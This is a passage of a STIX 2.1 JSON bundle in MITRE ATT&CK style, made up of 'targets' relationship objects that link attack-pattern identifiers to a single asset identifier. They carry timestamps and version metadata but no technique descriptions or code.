"x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--89abd323-af53-43e9-87d7-c59643e2bf32", "created": "2024-07-01T10:37:15.822974", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822976", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c94dfde6-6cb8-4a97-8a85-798d3ec5df52", "created": "2024-07-01T10:37:15.822983", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822986", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--95abf0e4-07a7-47a1-91c0-6b990b82963c", "created": "2024-07-01T10:37:15.822993", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822996", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--43376a60-1be6-41a1-bf3b-049f79044513", "created": "2024-07-01T10:37:15.823003", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823006", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--50106706-bb6c-4c15-a7ac-e9ab2a14a891", "created": "2024-07-01T10:37:15.823013", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823016", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7de1f7ac-5d0c-4c9c-8873-627202205331", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--87773ae2-e1a2-41a5-a8f7-7ac90bbac943", "created": "2024-07-01T10:37:15.823023", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823025", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4d4fcf03-d9cc-46f8-8745-69c111893882", "created": "2024-07-01T10:37:15.823033", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823035", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f53d187a-04de-450f-8d85-8a017878f10e", "created": "2024-07-01T10:37:15.823043", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823045", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--057d1038-1fe5-47a1-9029-98e4451dba78", "created": "2024-07-01T10:37:15.823053", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823056", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--824add00-99a1-4b15-9a2d-6c5683b7b497", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8b91d6d1-c7de-4b7e-8ad0-bd33e89ebd59", "created": "2024-07-01T10:37:15.823063", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823065", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7cb4def0-2b49-4449-94df-28d95df1e92c", "created": "2024-07-01T10:37:15.823073", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823075", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2fa61118-a994-4efc-9b45-2d8e0616a569", "created": "2024-07-01T10:37:15.823083", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823085", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f79760d6-43bc-4a16-ab18-584fc18c7790", "created": "2024-07-01T10:37:15.823093", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823095", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--83a766f8-1501-4b3a-a2de-2e2849e8dfc1", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--461ee098-7269-4fe5-8cc1-1f584b2caff8", "created": "2024-07-01T10:37:15.823103", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823105", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c053ba3c-ab83-4ee2-b395-3190f4b0a26a", "created": "2024-07-01T10:37:15.823113", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823115", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--851e071f-208d-4c79-adc6-5974c85c78f3", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a7a450b9-19c2-49ca-8bc5-b605c83d8ef3", "created": "2024-07-01T10:37:15.823123", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823125", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0a6545e3-32d8-47a9-b7b5-99ef665439e0", "created": "2024-07-01T10:37:15.823133", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823135", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4e61370e-736d-4beb-9406-5679429eed95", "created": "2024-07-01T10:37:15.823143", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823145", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--866d0d6d-02c6-42bd-aa2f-02907fdc0969", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d9f24749-37ff-4a7e-88b5-628cd0ac8897", "created": "2024-07-01T10:37:15.823153", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823155", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--86a96bf6-cf8b-411c-aaeb-8959944d64f7", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0758669d-2df2-488b-9068-9f6ca6837602", "created": "2024-07-01T10:37:15.823163", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823165", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e04d1a9d-69bc-4fde-8801-3aa1c6536ddd", "created": "2024-07-01T10:37:15.823173", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823175", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b3feda3d-ebda-4cca-a224-ecbfbcae83b8", "created": "2024-07-01T10:37:15.823183", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823185", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8c41090b-aa47-4331-986b-8c9a51a91103", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8e5a9400-4394-4f93-9dc0-73a9a489c868", "created": "2024-07-01T10:37:15.823193", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823195", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f85c04d0-6de1-4b55-b5d3-bc880232454b", "created": "2024-07-01T10:37:15.823203", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823205", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c6df712a-bfbb-4123-b5e1-1000bf587a4f", "created": "2024-07-01T10:37:15.823212", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823215", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2ec689c8-82a4-4040-8950-208df71d4a71", "created": "2024-07-01T10:37:15.823223", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823225", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4fd353e3-b621-40b2-9f97-8d2aefb8b2e8", "created": "2024-07-01T10:37:15.823233", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823235", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--922251ab-4ceb-40b0-9a3d-c9a6cd3bc70a", "created": "2024-07-01T10:37:15.823242", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823245", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--81d4c862-542e-49bc-8f47-c7bad638d131", "created": "2024-07-01T10:37:15.823252", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823255", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c43e1ef0-ad24-4a5e-88ea-128b29b8274c", "created": "2024-07-01T10:37:15.823262", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823264", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2674b75f-c058-4250-9055-15a7f24bbdc2", "created": "2024-07-01T10:37:15.823272", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823274", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--954a1639-f2d6-407d-aef3-4917622ca493", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b4287c59-9af2-4549-a831-f008cdcacc98", "created": "2024-07-01T10:37:15.823282", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823284", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6f77821c-51c6-4f5e-ba4c-d271715f9aae", "created": "2024-07-01T10:37:15.823292", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823294", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4889f122-f6c7-4045-8e4e-ff980736beb0", "created": "2024-07-01T10:37:15.823302", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823304", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--612dcce6-5a16-43b1-ad2b-73c8686fb860", "created": "2024-07-01T10:37:15.823312", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823314", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6b848dc5-0794-45f1-ae77-f152746f1b66", "created": "2024-07-01T10:37:15.823322", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823324", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9c99724c-a483-4d60-ad9d-7f004e42e8e8", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--65177ba1-6f70-4ea0-8ffe-e3356caf3c25", "created": "2024-07-01T10:37:15.823332", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823334", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--16be4bc9-7f26-49e2-af16-5a33361e3663", "created": "2024-07-01T10:37:15.823342", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823344", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--648ba2c7-39e3-4a09-8bb6-165af7d3fba0", "created": "2024-07-01T10:37:15.823352", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823354", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b81f37c7-429a-46ce-b464-50a5f9dc8a73", "created": "2024-07-01T10:37:15.823362", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823364", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a01bf75f-00b2-4568-a58f-565ff9bf202b", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--471c56a2-8dad-4036-aebe-7358947aeb84", "created": "2024-07-01T10:37:15.823371", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.823374", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--74a219fe-96e9-4eaf-9bdd-958edbe382db", "created": "2024-07-01T10:37:15.823381", 